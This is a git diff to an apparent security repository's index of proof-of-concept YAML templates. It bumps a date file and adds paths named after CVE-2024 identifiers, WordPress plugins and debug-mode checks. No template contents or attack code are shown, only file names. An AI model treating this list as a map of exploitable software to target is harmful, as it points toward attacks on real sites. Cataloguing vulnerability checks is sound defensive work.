diff --git a/date.txt b/date.txt index 96017a2033..3293c43992 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241017 +20241018 diff --git a/poc.txt b/poc.txt index c43da139f8..61f6ba2402 100644 --- a/poc.txt +++ b/poc.txt @@ -4574,6 +4574,7 @@ ./poc/auth/ptoffice-sign-ups-56ac6fa34cb2062592c555542a68f468.yaml ./poc/auth/ptoffice-sign-ups.yaml ./poc/auth/publishpress-authors-aaae11f293980d2db000f794df5fea87.yaml +./poc/auth/publishpress-authors.yaml ./poc/auth/pulmi-login-check.yaml ./poc/auth/pure-storage-login-9724.yaml ./poc/auth/pure-storage-login-9725.yaml @@ -33511,6 +33512,14 @@ ./poc/cve/CVE-2024-0984-71d91175d296ca328f8e62ec29060567.yaml ./poc/cve/CVE-2024-0984.yaml ./poc/cve/CVE-2024-0986.yaml +./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml +./poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml +./poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml +./poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml +./poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml +./poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml +./poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml +./poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml ./poc/cve/CVE-2024-1021.yaml ./poc/cve/CVE-2024-1037-b7f7f3d961a0c33ea429c4b0e05a6902.yaml ./poc/cve/CVE-2024-1037.yaml @@ -40915,6 +40924,7 @@ ./poc/cve/CVE-2024-43355.yaml ./poc/cve/CVE-2024-43356-05ef8f8be0b196ca83c544147054d339.yaml ./poc/cve/CVE-2024-43356.yaml +./poc/cve/CVE-2024-43360.yaml ./poc/cve/CVE-2024-4339-1866bca4b9e3a6717a6f3a0d1ca5a290.yaml ./poc/cve/CVE-2024-4339.yaml ./poc/cve/CVE-2024-4342-467c76b0438cb623f5d9e08694f1ab3a.yaml 
@@ -41931,26 +41941,47 @@ ./poc/cve/CVE-2024-4789-db4647af61ca31063be76c6f44a638fb.yaml ./poc/cve/CVE-2024-4789.yaml ./poc/cve/CVE-2024-48020-1a3c7c4e6432ae611b5dd11cacf3122e.yaml +./poc/cve/CVE-2024-48020.yaml ./poc/cve/CVE-2024-48021-3202536b475b114ecb69ceee58a3a6b8.yaml +./poc/cve/CVE-2024-48021.yaml ./poc/cve/CVE-2024-48022-6133e4f5ee13976ee5c7e531e6a0b00b.yaml +./poc/cve/CVE-2024-48022.yaml ./poc/cve/CVE-2024-48023-46eb55dd5256b43b1683f15c0267076d.yaml +./poc/cve/CVE-2024-48023.yaml ./poc/cve/CVE-2024-48024-026d31d33246acc9d70dccccb6421f1b.yaml +./poc/cve/CVE-2024-48024.yaml ./poc/cve/CVE-2024-48025-6cd3b5b51f7c36d669654b11d9494954.yaml +./poc/cve/CVE-2024-48025.yaml ./poc/cve/CVE-2024-48026-c610062733a00b0fb29ac3d3a3cb174d.yaml +./poc/cve/CVE-2024-48026.yaml ./poc/cve/CVE-2024-48027-571fc3513bb85aa3d64c4e670f573f21.yaml +./poc/cve/CVE-2024-48027.yaml ./poc/cve/CVE-2024-48028-d097d99e7659a13c8588ca3fa954efea.yaml +./poc/cve/CVE-2024-48028.yaml ./poc/cve/CVE-2024-48029-f32984f494ef89813740687a98347f73.yaml +./poc/cve/CVE-2024-48029.yaml ./poc/cve/CVE-2024-48030-c1a1b779ec73215e6e563fb87876aa6c.yaml +./poc/cve/CVE-2024-48030.yaml ./poc/cve/CVE-2024-48031-fcb96414f71b929b6afe671f5b124ef4.yaml +./poc/cve/CVE-2024-48031.yaml ./poc/cve/CVE-2024-48032-0e6d44d9755568189c98898b670b1718.yaml +./poc/cve/CVE-2024-48032.yaml ./poc/cve/CVE-2024-48033-8e518d6d8c8033e3eca865526322f99e.yaml +./poc/cve/CVE-2024-48033.yaml ./poc/cve/CVE-2024-48034-09a88c5693c52137983ef7e392beaeca.yaml +./poc/cve/CVE-2024-48034.yaml ./poc/cve/CVE-2024-48035-f92910012cdf616c24430d120425dc03.yaml +./poc/cve/CVE-2024-48035.yaml ./poc/cve/CVE-2024-48037-d89d0ad185b0c300ae96673f12cdc2bf.yaml +./poc/cve/CVE-2024-48037.yaml ./poc/cve/CVE-2024-48038-9c7f27476dd4a3919c1c8e4307f286a4.yaml +./poc/cve/CVE-2024-48038.yaml ./poc/cve/CVE-2024-48039-883dbbd880643eda64a8a99bdab006e4.yaml +./poc/cve/CVE-2024-48039.yaml ./poc/cve/CVE-2024-48040-7e3656b3612f7c9ba3d5478ddbb0a10f.yaml +./poc/cve/CVE-2024-48040.yaml 
./poc/cve/CVE-2024-48041-fa3562dd06d764593b2df833ed603b8d.yaml +./poc/cve/CVE-2024-48041.yaml ./poc/cve/CVE-2024-4821-e5c1c5c066fc4f0bbdd4673243f80699.yaml ./poc/cve/CVE-2024-4821.yaml ./poc/cve/CVE-2024-4836.yaml @@ -43447,6 +43478,7 @@ ./poc/cve/CVE-2024-7416-efec572b361a709c15a62ccf6c7c8234.yaml ./poc/cve/CVE-2024-7416.yaml ./poc/cve/CVE-2024-7417-39b6b1c12c710f52839dbc980c489688.yaml +./poc/cve/CVE-2024-7417.yaml ./poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml ./poc/cve/CVE-2024-7418.yaml ./poc/cve/CVE-2024-7420-5be6d8b9afb78ab58d15b1426a2e4662.yaml @@ -43685,6 +43717,7 @@ ./poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml ./poc/cve/CVE-2024-8031.yaml ./poc/cve/CVE-2024-8032-eed885e7e19c9a1253bd6ef65f880faf.yaml +./poc/cve/CVE-2024-8032.yaml ./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml ./poc/cve/CVE-2024-8043.yaml ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml @@ -43921,6 +43954,7 @@ ./poc/cve/CVE-2024-8547-cb709bfc0402decc4b7f4d6e8fc38cea.yaml ./poc/cve/CVE-2024-8547-f9226340964e19980e69bd0d0fc7b228.yaml ./poc/cve/CVE-2024-8547.yaml +./poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml ./poc/cve/CVE-2024-8548-796128d9dc0dcb2412f62b506447a915.yaml ./poc/cve/CVE-2024-8548.yaml ./poc/cve/CVE-2024-8549-15f69d1edc28dfdbc1fdf257b5bf9163.yaml @@ -43942,6 +43976,7 @@ ./poc/cve/CVE-2024-8629-aaa25d0c3c5315b31fba6133d516373c.yaml ./poc/cve/CVE-2024-8629.yaml ./poc/cve/CVE-2024-8632-25f2c261c33234a885698b7c793dc7d3.yaml +./poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml ./poc/cve/CVE-2024-8632.yaml ./poc/cve/CVE-2024-8633-21749f33a12286225fc84bbb3ba83124.yaml ./poc/cve/CVE-2024-8633.yaml 
@@ -43975,6 +44010,7 @@ ./poc/cve/CVE-2024-8681-8fc56993d1c07dd1495b80fa682fab16.yaml ./poc/cve/CVE-2024-8681.yaml ./poc/cve/CVE-2024-8700-de190b763c0105020f55ca3eecb3c90d.yaml +./poc/cve/CVE-2024-8700.yaml ./poc/cve/CVE-2024-8702-7e9cb00b97b3efd944b9c924708a1688.yaml ./poc/cve/CVE-2024-8702.yaml ./poc/cve/CVE-2024-8704-580bed351ea1cfb53e2819fa379514d4.yaml @@ -43992,6 +44028,7 @@ ./poc/cve/CVE-2024-8718-bae11f6e4558979b96cf12d8205fcc15.yaml ./poc/cve/CVE-2024-8718.yaml ./poc/cve/CVE-2024-8719-11acce34bf7f1b7b222e1642931e8df6.yaml +./poc/cve/CVE-2024-8719.yaml ./poc/cve/CVE-2024-8720-8bc6aa18362e1b679d780808df5127f3.yaml ./poc/cve/CVE-2024-8720-de75ddb341cf2c3da9270fff1b0efdb8.yaml ./poc/cve/CVE-2024-8720.yaml @@ -44022,6 +44059,7 @@ ./poc/cve/CVE-2024-8737.yaml ./poc/cve/CVE-2024-8738-a508f2d239f8ce325b6596a0349be61b.yaml ./poc/cve/CVE-2024-8738.yaml +./poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml ./poc/cve/CVE-2024-8741-9090a1c578e6405d68b9ed07468050f6.yaml ./poc/cve/CVE-2024-8741.yaml ./poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml @@ -44048,6 +44086,7 @@ ./poc/cve/CVE-2024-8787.yaml ./poc/cve/CVE-2024-8788-0411ba5eec7a5fa7510e28a75f73259c.yaml ./poc/cve/CVE-2024-8788.yaml +./poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml ./poc/cve/CVE-2024-8791-dc4e8630da27bf521316c36321cd06e6.yaml ./poc/cve/CVE-2024-8791.yaml ./poc/cve/CVE-2024-8793-51c185f1f91fe91ed28de00dd0c93adc.yaml @@ -44093,6 +44132,7 @@ ./poc/cve/CVE-2024-8914.yaml ./poc/cve/CVE-2024-8915-c96fbadd6669597791ff972bbeeaf8cd.yaml ./poc/cve/CVE-2024-8915.yaml +./poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml ./poc/cve/CVE-2024-8917-6aaaaa729e35997797a61f2cd09b6335.yaml ./poc/cve/CVE-2024-8917.yaml ./poc/cve/CVE-2024-8918-39a625e1782075559e42a69384a96eb7.yaml 
@@ -44100,6 +44140,7 @@ ./poc/cve/CVE-2024-8919-fb0057a26cabecd9dfc880674f08a19a.yaml ./poc/cve/CVE-2024-8919.yaml ./poc/cve/CVE-2024-8920-c26e8a37d801dd2fd8f4d049cefa30a5.yaml +./poc/cve/CVE-2024-8920.yaml ./poc/cve/CVE-2024-8921-c8cc9d28480d3f962411e8d319aaea3f.yaml ./poc/cve/CVE-2024-8921.yaml ./poc/cve/CVE-2024-8922-c5ca682c393465990ffa3f49f528998c.yaml @@ -44206,6 +44247,7 @@ ./poc/cve/CVE-2024-9177-178dee7653fa8d80dc1711bad3dcec51.yaml ./poc/cve/CVE-2024-9177.yaml ./poc/cve/CVE-2024-9184-bbbcea152c8a7afc5cdfbc5a529501a6.yaml +./poc/cve/CVE-2024-9184.yaml ./poc/cve/CVE-2024-9187-8b43f9d2f6a2b591d59c81d2238caf51.yaml ./poc/cve/CVE-2024-9187.yaml ./poc/cve/CVE-2024-9189-887572e2c273c4a4bdeea21969a91124.yaml @@ -44214,6 +44256,7 @@ ./poc/cve/CVE-2024-9204.yaml ./poc/cve/CVE-2024-9205-0bcbe389b220d66f2a81aab2e381ea3e.yaml ./poc/cve/CVE-2024-9205.yaml +./poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml ./poc/cve/CVE-2024-9207-562a1a40f6f33163d985b74bcbe67bf6.yaml ./poc/cve/CVE-2024-9207.yaml ./poc/cve/CVE-2024-9209-4a8efe6f56cb7a747dfc8726b95406f4.yaml @@ -44224,7 +44267,9 @@ ./poc/cve/CVE-2024-9211-bb6a727cd9f729d2c4f5e85e9849f1e6.yaml ./poc/cve/CVE-2024-9211.yaml ./poc/cve/CVE-2024-9213-dae363b473afb57d7fbb1aad2d776b3a.yaml +./poc/cve/CVE-2024-9213.yaml ./poc/cve/CVE-2024-9215-bd487c67d70329011b9510288cdc3f00.yaml +./poc/cve/CVE-2024-9215.yaml ./poc/cve/CVE-2024-9218-75beb28483214f413384b6d563c1c16a.yaml ./poc/cve/CVE-2024-9218.yaml ./poc/cve/CVE-2024-9220-0848a89ff064206197a24c79c138cacc.yaml 
@@ -44249,11 +44294,13 @@ ./poc/cve/CVE-2024-9237-0780221ee4da552afeda6f1d6485730c.yaml ./poc/cve/CVE-2024-9237.yaml ./poc/cve/CVE-2024-9240-e1b23a53c56acd157c1d8d507856a949.yaml +./poc/cve/CVE-2024-9240.yaml ./poc/cve/CVE-2024-9241-ab99313638ead0b4242684f4ddea4fdd.yaml ./poc/cve/CVE-2024-9241.yaml ./poc/cve/CVE-2024-9242-ce100a23dcb6a754af3f48866fed1686.yaml ./poc/cve/CVE-2024-9242.yaml ./poc/cve/CVE-2024-9263-9f819c527e666a0f4e5ffb74898c3f93.yaml +./poc/cve/CVE-2024-9263.yaml ./poc/cve/CVE-2024-9265-6f041754ba39de1f44500ace37c6936a.yaml ./poc/cve/CVE-2024-9265.yaml ./poc/cve/CVE-2024-9267-8893aa1c1ec1b76901d7871f6ed6bfe5.yaml 
@@ -44285,22 +44332,32 @@ ./poc/cve/CVE-2024-9346-e439b0199a5e66918fb6aa956d50260c.yaml ./poc/cve/CVE-2024-9346.yaml ./poc/cve/CVE-2024-9347-d7d68470814339ade87e3333f63d9581.yaml +./poc/cve/CVE-2024-9347.yaml ./poc/cve/CVE-2024-9349-7c25de810a6c2b05091210cf0a795a24.yaml ./poc/cve/CVE-2024-9349.yaml +./poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml ./poc/cve/CVE-2024-9351-a4fe42cafc348ca65fcdc7f857114ced.yaml +./poc/cve/CVE-2024-9351.yaml ./poc/cve/CVE-2024-9352-f4efbd8a128de26fc7d35a6fba2877bf.yaml +./poc/cve/CVE-2024-9352.yaml ./poc/cve/CVE-2024-9353-9de693d4e41071f01a7ec1909bb538f7.yaml ./poc/cve/CVE-2024-9353.yaml +./poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml +./poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml +./poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml ./poc/cve/CVE-2024-9368-f73b1d1941e16150d358a5f322adc321.yaml ./poc/cve/CVE-2024-9368.yaml ./poc/cve/CVE-2024-9372-090fa9b8863f4b571cd4ca3dfada9d0b.yaml ./poc/cve/CVE-2024-9372.yaml +./poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml ./poc/cve/CVE-2024-9375-1ada64725f832858cb5e8e8b357262ef.yaml ./poc/cve/CVE-2024-9375.yaml ./poc/cve/CVE-2024-9377-eb9f54f5139e537cd6a9ac4820541be4.yaml ./poc/cve/CVE-2024-9377.yaml ./poc/cve/CVE-2024-9378-8974a5e92d4cff0ea3c01120fb204b47.yaml ./poc/cve/CVE-2024-9378.yaml +./poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml +./poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml ./poc/cve/CVE-2024-9384-45317d12b3612671d113cd9ed97a884f.yaml ./poc/cve/CVE-2024-9384.yaml ./poc/cve/CVE-2024-9385-1de8f25af6fe092f26514a5fa6e55dd4.yaml @@ -44309,6 +44366,7 @@ ./poc/cve/CVE-2024-9417.yaml ./poc/cve/CVE-2024-9421-e6941b13a2ee565b8bc663927340951b.yaml ./poc/cve/CVE-2024-9421.yaml +./poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml ./poc/cve/CVE-2024-9435-5d078f7f1a49787ecddc7ee4b0d0833f.yaml ./poc/cve/CVE-2024-9435.yaml ./poc/cve/CVE-2024-9436-72a457058cb05b316cebd946dd84ec21.yaml 
@@ -44321,6 +44379,7 @@ ./poc/cve/CVE-2024-9449.yaml ./poc/cve/CVE-2024-9451-c1f6ee026eb239e994577f2465642250.yaml ./poc/cve/CVE-2024-9451.yaml +./poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml ./poc/cve/CVE-2024-9455-a14edcb4af91ec88c5513b8bfa9f2d1c.yaml ./poc/cve/CVE-2024-9455.yaml ./poc/cve/CVE-2024-9457-72dd9bc9875b76de9e691aa9064bfa77.yaml @@ -44356,6 +44415,7 @@ ./poc/cve/CVE-2024-9548-4c3a7fa475046e4dcaed7de30c0d051a.yaml ./poc/cve/CVE-2024-9548.yaml ./poc/cve/CVE-2024-9575-0226044c8d797938fb612d7344053128.yaml +./poc/cve/CVE-2024-9575.yaml ./poc/cve/CVE-2024-9581-3deefaeba320bc3f8ff9dd6ea032aa20.yaml ./poc/cve/CVE-2024-9581.yaml ./poc/cve/CVE-2024-9582-65ec68651aab51111dffe0adecdaff01.yaml @@ -44386,13 +44446,16 @@ ./poc/cve/CVE-2024-9656.yaml ./poc/cve/CVE-2024-9670-590d40c02bbb47b092deffa0e1d25829.yaml ./poc/cve/CVE-2024-9670.yaml +./poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml ./poc/cve/CVE-2024-9685-162e285486f85718f1eff0c9fc075030.yaml ./poc/cve/CVE-2024-9685.yaml ./poc/cve/CVE-2024-9687-b374db15d58a163b3240b89c41715498.yaml ./poc/cve/CVE-2024-9687.yaml ./poc/cve/CVE-2024-9689-47104403d02f947163494ee0975df512.yaml +./poc/cve/CVE-2024-9689.yaml ./poc/cve/CVE-2024-9696-7eb3ceca660ff8ed51fe8b0a6a2f165c.yaml ./poc/cve/CVE-2024-9696.yaml +./poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml ./poc/cve/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml ./poc/cve/CVE-2024-9704.yaml ./poc/cve/CVE-2024-9707-4fb16dfc3a442890f762f60d876d8c4d.yaml 
@@ -44413,28 +44476,36 @@ ./poc/cve/CVE-2024-9824.yaml ./poc/cve/CVE-2024-9837-640ab38f88c83ed061eb38b767c65747.yaml ./poc/cve/CVE-2024-9837.yaml +./poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml ./poc/cve/CVE-2024-9860-b04ee97e5d460a289f93568831e0cf5e.yaml ./poc/cve/CVE-2024-9860.yaml ./poc/cve/CVE-2024-9861-cfe0d10a7099e61a765c45a5117c1825.yaml +./poc/cve/CVE-2024-9861.yaml ./poc/cve/CVE-2024-9862-4c515258d7126da4aa95e80d95f6a5c1.yaml +./poc/cve/CVE-2024-9862.yaml ./poc/cve/CVE-2024-9863-c87082cf07c135fafcb187e887a8da89.yaml +./poc/cve/CVE-2024-9863.yaml ./poc/cve/CVE-2024-9873-c5ed80b51344fca9873ea5af2135924b.yaml ./poc/cve/CVE-2024-9873.yaml ./poc/cve/CVE-2024-9888-8bc8fdc1eaaf79b8ee4d0d77b372a40f.yaml ./poc/cve/CVE-2024-9888.yaml ./poc/cve/CVE-2024-9891-2ab1858bc0a4346f292143b3e3d4717f.yaml ./poc/cve/CVE-2024-9891.yaml +./poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml ./poc/cve/CVE-2024-9893-f0049aface0e9d994b8b256bddfdec1b.yaml ./poc/cve/CVE-2024-9893.yaml ./poc/cve/CVE-2024-9895-6f8924e42d51af274da92f196c6372b1.yaml ./poc/cve/CVE-2024-9895.yaml ./poc/cve/CVE-2024-9898-7b8053b6be9c8712ff2d49ed6c3dc10e.yaml +./poc/cve/CVE-2024-9898.yaml ./poc/cve/CVE-2024-9937-9915217ba7d6f29cd232016898fb9998.yaml ./poc/cve/CVE-2024-9937.yaml ./poc/cve/CVE-2024-9940-7282ba1c7231feca51bd0ab70c139261.yaml +./poc/cve/CVE-2024-9940.yaml ./poc/cve/CVE-2024-9944-c4d693e491a7b94e2552e7400b79d0d6.yaml ./poc/cve/CVE-2024-9944.yaml ./poc/cve/CVE-2024-9951-be046d8362f1832edd91856d0526cdb7.yaml +./poc/cve/CVE-2024-9951.yaml ./poc/cve/CVE202127562-220331-222408.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml @@ -52269,6 +52340,7 @@ ./poc/debug/sitecore-debug-page-10285.yaml ./poc/debug/sitecore-debug-page.yaml ./poc/debug/soap-ajax-debugshell.yaml +./poc/debug/strut-debug-mode.yaml ./poc/debug/struts-debug-mode-10559.yaml ./poc/debug/struts-debug-mode-10560.yaml ./poc/debug/struts-debug-mode-10561.yaml 
@@ -62043,6 +62115,7 @@ ./poc/microsoft/miniorange-firebase-sms-otp-verification-22c963942345caf88900612979c9cae6.yaml ./poc/microsoft/miniorange-firebase-sms-otp-verification-4468e2106e183a688613280714142718.yaml ./poc/microsoft/miniorange-firebase-sms-otp-verification-887b055ad889aa10b3dc934d36ffbf4f.yaml +./poc/microsoft/miniorange-firebase-sms-otp-verification.yaml ./poc/microsoft/mm-forms-community-9b22852627967262a0033b664f77f26c.yaml ./poc/microsoft/mm-forms-community.yaml ./poc/microsoft/modern-designs-for-gravity-forms-6477bf18cad6c823db485408d49b337b.yaml @@ -76731,6 +76804,7 @@ ./poc/other/add-to-feedly.yaml ./poc/other/add-user-role-21e7e28b1bd21b72344ed338d4838ea7.yaml ./poc/other/add-user-role.yaml +./poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml ./poc/other/add-widgets-to-page-6dd76854df716f92f3713948d74c7196.yaml ./poc/other/add-widgets-to-page.yaml ./poc/other/add2fav-d0b66ad8340cbda7cc5753e39ef1c7d5.yaml @@ -77113,6 +77187,7 @@ ./poc/other/advanced-booking-calendar-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advanced-booking-calendar-plugin.yaml ./poc/other/advanced-booking-calendar.yaml +./poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml ./poc/other/advanced-category-template-4dfad7f8c1b3e76abdd4b87e074ede23.yaml ./poc/other/advanced-category-template-f71c7106c714a62195172820fb00c915.yaml ./poc/other/advanced-category-template.yaml @@ -78245,6 +78320,7 @@ ./poc/other/arcom-malware.yaml ./poc/other/arconix-faq-56239764c43cd4666defc5c1ee7c1873.yaml ./poc/other/arconix-faq.yaml +./poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml ./poc/other/arconix-shortcodes-7a41a1e084cd2f3ac351e8264449d771.yaml ./poc/other/arconix-shortcodes-f5f9ec1a66da2f65afef7cacfc25a1c0.yaml ./poc/other/arconix-shortcodes.yaml 
@@ -80137,6 +80213,7 @@ ./poc/other/brandfolder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/brandfolder-plugin.yaml ./poc/other/brandfolder.yaml +./poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml ./poc/other/bravada-8ea16af389c1d6b6902cbc3c30c42d83.yaml ./poc/other/bravada.yaml ./poc/other/brave-phish.yaml @@ -80561,6 +80638,7 @@ ./poc/other/bulk-editor.yaml ./poc/other/bulk-image-alt-text-with-yoast-8bcf0403da71d586e0e15d6051979d24.yaml ./poc/other/bulk-image-alt-text-with-yoast.yaml +./poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml ./poc/other/bulk-image-title-attribute-5bd5aa842bdc4d50b077cba9da1f3c12.yaml ./poc/other/bulk-image-title-attribute-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bulk-image-title-attribute-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83340,6 +83418,7 @@ ./poc/other/create-block-theme.yaml ./poc/other/create-bucket.yaml ./poc/other/create-f93a4314da2b6ca44fe64167be75ce25.yaml +./poc/other/create-flipbook-from-pdf.yaml ./poc/other/create.yaml ./poc/other/creative-addons-for-elementor-092b5cbcb926412f552245832dc8d8dc.yaml ./poc/other/creative-addons-for-elementor.yaml @@ -83995,6 +84074,7 @@ ./poc/other/dearpdf-lite-a37d44de66fefc417ca516737edd4052.yaml ./poc/other/dearpdf-lite.yaml ./poc/other/debian.yaml +./poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml ./poc/other/decalog-69862cce8cff7d2d39740f235792aec9.yaml ./poc/other/decalog.yaml ./poc/other/deep-blue-0d6c75eb4cb21682235e690ad8d026b9.yaml @@ -84324,6 +84404,7 @@ ./poc/other/disabler-5f5024299ff002b1b0dad1c3a4de6783.yaml ./poc/other/disabler.yaml ./poc/other/disc-golf-manager-87fd0c6ebf33ae0c4541e30377b20498.yaml +./poc/other/disc-golf-manager.yaml ./poc/other/discogs.yaml ./poc/other/discord-client-id.yaml ./poc/other/discord-phish.yaml 
@@ -85271,7 +85352,10 @@ ./poc/other/easy-pixels-by-jevnet-79c8a4ffa9a8ac887fdf0fbdc6e80f74.yaml ./poc/other/easy-pixels-by-jevnet.yaml ./poc/other/easy-popup-show.yaml +./poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml +./poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml ./poc/other/easy-post-types-47b03f08b2c86cb04ae26a4f2f4da9aa.yaml +./poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml ./poc/other/easy-post-types.yaml ./poc/other/easy-post-views-count-ae6476461be319aaccada90332153205.yaml ./poc/other/easy-post-views-count.yaml @@ -85702,6 +85786,7 @@ ./poc/other/elegant-pink.yaml ./poc/other/elegant-themes-icons-f4de45cac420185bd4a02c27c2e97e1c.yaml ./poc/other/elegant-themes-icons.yaml +./poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml ./poc/other/element-ready-lite-66ec7ab88b502756d65fc9821abaaf74.yaml ./poc/other/element-ready-lite-94b21f21217e93f10723771be259bf05.yaml ./poc/other/element-ready-lite-996340b247c4d15433fd33467ee38312.yaml @@ -86530,6 +86615,7 @@ ./poc/other/event-calendar-wd-plugin.yaml ./poc/other/event-calendar-wd.yaml ./poc/other/event-calendars-cfabc15b3c29e69217f6ffeac4d81a3b.yaml +./poc/other/event-calendars.yaml ./poc/other/event-easy-calendar-4e8aa55b46555bc979d5a286528ea82a.yaml ./poc/other/event-easy-calendar-80ab23e77cc71af4ffd65eca0ab437e8.yaml ./poc/other/event-easy-calendar-8227d9b1b74cf347a95813b6804b631a.yaml @@ -86986,6 +87072,7 @@ ./poc/other/extensive-vc-addon-0e78620225161ad18a3ee1ed967cbc08.yaml ./poc/other/extensive-vc-addon.yaml ./poc/other/external-featured-image-from-bing-6b05b75b5f7a0c86bc701d486f671a02.yaml +./poc/other/external-featured-image-from-bing.yaml ./poc/other/external-media-8cbd4a5897c6821bd03260c510651652.yaml ./poc/other/external-media-c610dd76c06151d00457b0ccb2802b71.yaml ./poc/other/external-media-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -87299,6 +87386,7 @@ ./poc/other/featured-post-creative-c70dd3ca915f5566afae3da744b9cb85.yaml ./poc/other/featured-post-creative.yaml ./poc/other/featured-posts-with-multiple-custom-groups-fpmcg-31859a41abcd3ada53000a62b9e48892.yaml +./poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml ./poc/other/federatedpress-mastodon-instance.yaml ./poc/other/feed-changer-e67c211b6c31af1566744d218f7c0a06.yaml ./poc/other/feed-changer.yaml @@ -87643,6 +87731,7 @@ ./poc/other/flat-preloader-a0e0e1a16d947aaa7c62bda95132c6a3.yaml ./poc/other/flat-preloader-c387bc071d1ef8a8a150ac0525598884.yaml ./poc/other/flat-preloader.yaml +./poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml ./poc/other/flatpress.yaml ./poc/other/flatsome-3f6b244918ae6d23248f545d5a2c7877.yaml ./poc/other/flatsome-73c67231ecd48aea95e4eeb093bf93ad.yaml @@ -87683,6 +87772,7 @@ ./poc/other/flexible-shipping-usps-e9e36a60529338c1efcb1cc580097e2b.yaml ./poc/other/flexible-shipping-usps.yaml ./poc/other/flexible-shipping.yaml +./poc/other/flexmls-idx.yaml ./poc/other/flexnet_publisher.yaml ./poc/other/flickr-gallery-5d19b62ef05aec0b9e2aea4a3c907c11.yaml ./poc/other/flickr-gallery-8c07be2c7a1693818604febc00838a68.yaml @@ -87914,6 +88004,7 @@ ./poc/other/fontmeister-4faffe8d18050f583a8fc219e25c00dc.yaml ./poc/other/fontmeister.yaml ./poc/other/fonto-42d19dec467a5cd49bcb56ac65cb8b38.yaml +./poc/other/fonto.yaml ./poc/other/fontsampler-0505170bafd96f142dd43f019268bac7.yaml ./poc/other/fontsampler-c8f1a34ab04e902713044551a76173de.yaml ./poc/other/fontsampler-d23d0b4ce6c99393a215217b40032cf1.yaml @@ -88719,6 +88810,7 @@ ./poc/other/ganglia-xml-grid-monitor.yaml ./poc/other/ganglia.yaml ./poc/other/gantry-26331f1e23aa3cae2c716a0d19223272.yaml +./poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml ./poc/other/gantry-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/gantry-e7d1b99e868be00cfbca65c0c50e796a.yaml ./poc/other/gantry-f076075f1ff6a37e358bf06783a72186.yaml 
@@ -88916,6 +89008,7 @@ ./poc/other/get-your-number.yaml ./poc/other/get.yaml ./poc/other/getmonero.yaml +./poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml ./poc/other/getresponse-integration-e5d7fa71e6908442857a0cb0670fa481.yaml ./poc/other/getresponse-integration-fa4bcc5aa8ddc19efefa3934ed36cbc7.yaml ./poc/other/getresponse-integration.yaml @@ -90865,6 +90958,7 @@ ./poc/other/indianic-testimonial.yaml ./poc/other/indusguard-waf.yaml ./poc/other/infinite-41a0e2197b1e34008d46269e662a4b92.yaml +./poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml ./poc/other/infinite.yaml ./poc/other/infocus-01b2c43a0128da282dcced6fec397407.yaml ./poc/other/infocus-146240802372d8034245f2f20343755c.yaml @@ -91237,6 +91331,7 @@ ./poc/other/ip-guard.yaml 